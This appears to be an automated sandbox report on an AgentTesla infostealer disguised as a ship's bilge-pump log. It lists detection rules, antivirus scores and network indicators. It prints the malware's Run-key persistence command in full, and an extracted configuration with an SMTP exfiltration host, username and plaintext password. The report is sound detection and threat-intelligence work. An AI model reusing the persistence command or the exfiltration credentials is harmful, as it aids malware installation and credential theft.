0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34694:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x7044a:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34706:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x704bc:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34790:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x70546:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34822:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x705d8:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3488c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x70642:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x348fe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x706b4:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34994:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x7074a:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x34a24:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548 0x707da:$s8: 3C886FF3-2669-4AA2-A8FB-3F6759A77548
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack	JoeSecurity_DarkTortilla	Yara detected DarkTortilla Crypter	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack	JoeSecurity_GenericDownloader_1	Yara detected Generic Downloader	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack	INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID	Detects executables referencing Windows vault credential objects. Observed in infostealers	ditekSHen	0x34694:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x70464:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0xac224:$s1: 2F1A6504-0641-44CF-8BB5-3612D865F2E5 0x34706:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x704d6:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0xac296:$s2: 3CCD5499-87A8-4B10-A215-608888DD3B55 0x34790:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x70560:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0xac320:$s3: 154E23D0-C644-4E6F-8CE6-5069272F999F 0x34822:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x705f2:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0xac3b2:$s4: 4BF4C442-9B8A-41A0-B380-DD4A704DDB28 0x3488c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x7065c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0xac41c:$s5: 77BC582B-F0A6-4E15-4E80-61736B6F3B29 0x348fe:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x706ce:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0xac48e:$s6: E69D7838-91B5-4FC9-89D5-230D4D4CC2BC 0x34994:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0x70764:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B 0xac524:$s7: 3E0E35BE-1B77-43E7-B873-AED901B6275B
Click to see the 47 entries

Sigma Signatures

System Summary

Sigma detected: CurrentVersion Autorun Keys Modification

Source: Registry Key set

Author: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\SysWOW64\reg.exe, ProcessId: 8080, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\program

Sigma detected: Direct Autorun Keys Modification

Source: Process started

Author: Victor Sergeev, Daniil Yugoslavskiy, oscd.community: Data: Command: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe", CommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe", CommandLine|base64offset|contains: DA, Image: C:\Windows\SysWOW64\reg.exe, NewProcessName: C:\Windows\SysWOW64\reg.exe, OriginalFileName: C:\Windows\SysWOW64\reg.exe, ParentCommandLine: "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe", ParentImage: C:\Windows\SysWOW64\cmd.exe, ParentProcessId: 7564, ParentProcessName: cmd.exe, ProcessCommandLine: REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe", ProcessId: 8080, ProcessName: reg.exe

Sigma detected: Potential Persistence Attempt Via Run Keys Using Reg.EXE

Source: Process started

Author: Florian Roth (Nextron Systems): Data: Command: "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe", CommandLine: "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe", CommandLine|base64offset|contains: , Image: C:\Windows\SysWOW64\cmd.exe, NewProcessName: C:\Windows\SysWOW64\cmd.exe, OriginalFileName: C:\Windows\SysWOW64\cmd.exe, ParentCommandLine: "C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe", ParentImage: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, ParentProcessId: 7336, ParentProcessName: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, ProcessCommandLine: "cmd" /c ping 127.0.0.1 -n 37 > nul && REG ADD "HKCU\Software\Microsoft\Windows\CurrentVersion\Run" /f /v "program" /t REG_SZ /d "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe", ProcessId: 7564, ProcessName: cmd.exe

Snort Signatures

⊘No Snort rule has matched

Joe Sandbox Signatures

Click to jump to signature section

Show All Signature Results

AV Detection

Antivirus / Scanner detection for submitted sample

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Avira: detected

Antivirus detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe

Avira: detection malicious, Label: HEUR/AGEN.1314454

Found malware configuration

Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack

Malware Configuration Extractor: Agenttesla {"Exfil Mode": "SMTP", "Host": "mail.crediperu.pe", "Username": "informes@crediperu.pe", "Password": "Jfupuy02chung"}

Multi AV Scanner detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	ReversingLabs: Detection: 60%
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe	Virustotal: Detection: 65%			Perma Link

Multi AV Scanner detection for submitted file

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	ReversingLabs: Detection: 60%
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Virustotal: Detection: 63%			Perma Link

Machine Learning detection for dropped file

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe

Joe Sandbox ML: detected

Machine Learning detection for sample

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Joe Sandbox ML: detected

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe

Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

Source:	Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: newfile.exe, 00000012.00000000.3690297545.0000000000362000.00000002.00000001.01000000.0000000C.sdmp, newfile.exe.16.dr
Source:	Binary string: InstallUtil.pdb source: newfile.exe, 00000012.00000000.3690297545.0000000000362000.00000002.00000001.01000000.0000000C.sdmp, newfile.exe.16.dr

Networking

Uses ping.exe to check the status of other devices and networks

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\PING.EXE ping 127.0.0.1 -n 37

Yara detected Generic Downloader

Source: Yara match	File source: 15.2.InstallUtil.exe.7b0000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack, type: UNPACKEDPE

Source: global traffic

TCP traffic: 192.168.2.4:49743 -> 158.106.134.182:26

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: Joe Sandbox View

IP Address: 208.95.112.1 208.95.112.1

Source: unknown

DNS query: name: ip-api.com

Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: global traffic

HTTP traffic detected: GET /line/?fields=hosting HTTP/1.1Host: ip-api.comConnection: Keep-Alive

Source: unknown

DNS traffic detected: queries for: ip-api.com

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, dll.exe.8.dr	String found in binary or memory: http://admin-pp.crodip.fr/admin/diagnostic/get-pdf-view?id=
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, dll.exe.8.dr	String found in binary or memory: http://admin-pp.crodip.fr/depots/_parametres/cr_RapportInspection.rpt
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, dll.exe.8.dr	String found in binary or memory: http://admin-pp.crodip.fr/pdf/
Source: InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crediperu.pe
Source: InstallUtil.exe, 00000010.00000002.4157281481.0000000006650000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
Source: InstallUtil.exe, 00000010.00000002.4157281481.0000000006650000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
Source: InstallUtil.exe, 00000010.00000002.4150622961.000000000147F000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: InstallUtil.exe, 00000010.00000002.4157281481.0000000006650000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://crl.comodoca.com/cPanelIncCertificationAuthority.crl0
Source: InstallUtil.exe, 00000010.00000002.4151678724.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.4151678724.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ip-api.com/line/?fields=hosting
Source: InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://mail.crediperu.pe
Source: InstallUtil.exe, 00000010.00000002.4157281481.0000000006650000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.4150622961.000000000147F000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: InstallUtil.exe, 00000010.00000002.4151678724.00000000032F1000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.carterandcone.coml
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/?
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/cabarga.htmlN
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers/frere-user.html
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers8
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designers?
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fontbureau.com/designersG
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.fonts.com
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/bThe
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.founder.com.cn/cn/cThe
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/DPlease
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.galapagosdesign.com/staff/dennis.htm
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.goodfont.co.kr
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.jiyu-kobo.co.jp/
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sajatypeworks.com
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sakkal.com
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.sandoll.co.kr
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.tiro.com
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.typography.netD
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.urwpp.deDPlease
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2046786575.0000000006E12000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: http://www.zhongyicts.com.cn
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.00000000037B4000.00000004.00000800.00020000.00000000.sdmp, SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, 00000000.00000002.2044932954.0000000003689000.00000004.00000800.00020000.00000000.sdmp, dll.exe, 0000000E.00000002.3568807416.000000000411C000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000000F.00000002.3230473196.00000000007B2000.00000040.00000400.00020000.00000000.sdmp	String found in binary or memory: https://account.dyn.com/
Source: InstallUtil.exe, 00000010.00000002.4157281481.0000000006650000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000010.00000002.4151678724.0000000003354000.00000004.00000800.00020000.00000000.sdmp	String found in binary or memory: https://sectigo.com/CPS0

Key, Mouse, Clipboard, Microphone and Screen Capturing

Contains functionality to log keystrokes (.Net Source)

Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, NDL2m67zO.cs	.Net Code: _0bCxLHOPVXi
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack, NDL2m67zO.cs	.Net Code: _0bCxLHOPVXi
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack, NDL2m67zO.cs	.Net Code: _0bCxLHOPVXi
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack, NDL2m67zO.cs	.Net Code: _0bCxLHOPVXi
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack, NDL2m67zO.cs	.Net Code: _0bCxLHOPVXi

System Summary

Malicious sample detected (through community Yara rule)

Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 15.2.InstallUtil.exe.7b0000.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.373cec2.5.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37f07d8.2.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.3701102.0.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.37b4a22.1.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen
Source: 0.2.SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe.36c5332.3.raw.unpack, type: UNPACKEDPE	Matched rule: Detects executables referencing Windows vault credential objects. Observed in infostealers Author: ditekSHen

.NET source code contains very large strings

Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, x5M7.cs	Long String: Length: 10428
Source: SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe, x5M7.cs	Long String: Length: 15070
Source: dll.exe.8.dr, x5M7.cs	Long String: Length: 10428
Source: dll.exe.8.dr, x5M7.cs	Long String: Length: 15070

Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\dll.exe

Code function: 14_2_02E19CB0 CreateProcessAsUserW,

14_2_02E19CB0

Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_025252F8	0_2_025252F8
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_02527898	0_2_02527898
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_04C25034	0_2_04C25034
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_04C27240	0_2_04C27240
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_04C27230	0_2_04C27230
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_059D10AB	0_2_059D10AB
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_05C72A78	0_2_05C72A78
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_05C7E1A8	0_2_05C7E1A8
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_05C7C968	0_2_05C7C968
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_06DE28C8	0_2_06DE28C8
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_06DED30F	0_2_06DED30F
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_06DED320	0_2_06DED320
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_07341C68	0_2_07341C68
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_0734BF88	0_2_0734BF88
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_0737AE38	0_2_0737AE38
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_0737B6C8	0_2_0737B6C8
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_0737415D	0_2_0737415D
Source: C:\Users\user\Desktop\SG FOUNDATION SG24004-01CZ24001-01 Daily cargo hold bilge pump out log ==Final Report==.exe	Code function: 0_2_07374190	0_2_07374190
